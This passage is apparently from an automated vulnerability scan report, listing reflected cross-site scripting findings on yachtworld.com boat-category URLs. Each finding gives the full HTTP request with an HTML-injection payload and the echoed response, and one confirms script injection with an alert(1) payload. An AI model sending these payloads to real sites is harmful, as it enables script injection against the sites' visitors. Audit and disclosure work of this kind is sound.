savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:34 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type21995"><a>b3c7d68a669/Sabre/1">
...[SNIP]...

3.274. http://www.yachtworld.com/boats/category/type/Sabre/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Sabre/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dce7"><a>f1fc5582fc6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Sabre9dce7"><a>f1fc5582fc6/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

3.275. http://www.yachtworld.com/boats/category/type/Sabre/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Sabre/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53087"><a>906630f7490 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Sabre/153087"><a>906630f7490 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:55 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type/Sabre/153087"><a>906630f7490/1">
...[SNIP]...

3.276. http://www.yachtworld.com/boats/category/type/Sea+Ray/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Sea+Ray/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60aec"><a>a1f318a50b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type60aec"><a>a1f318a50b/Sea+Ray/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:31 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type60aec"><a>a1f318a50b/Sea+Ray/1">
...[SNIP]...

3.277. http://www.yachtworld.com/boats/category/type/Sea+Ray/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Sea+Ray/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf204"><a>8cd7dafa3db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Sea+Raybf204"><a>8cd7dafa3db/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:38 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Sea+Raybf204"><a>8cd7dafa3db/A-1">
...[SNIP]...

3.278. http://www.yachtworld.com/boats/category/type/Sea+Ray/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Sea+Ray/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13469"><script>alert(1)</script>951e3c34935 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Sea+Ray/113469"><script>alert(1)</script>951e3c34935 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:48 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
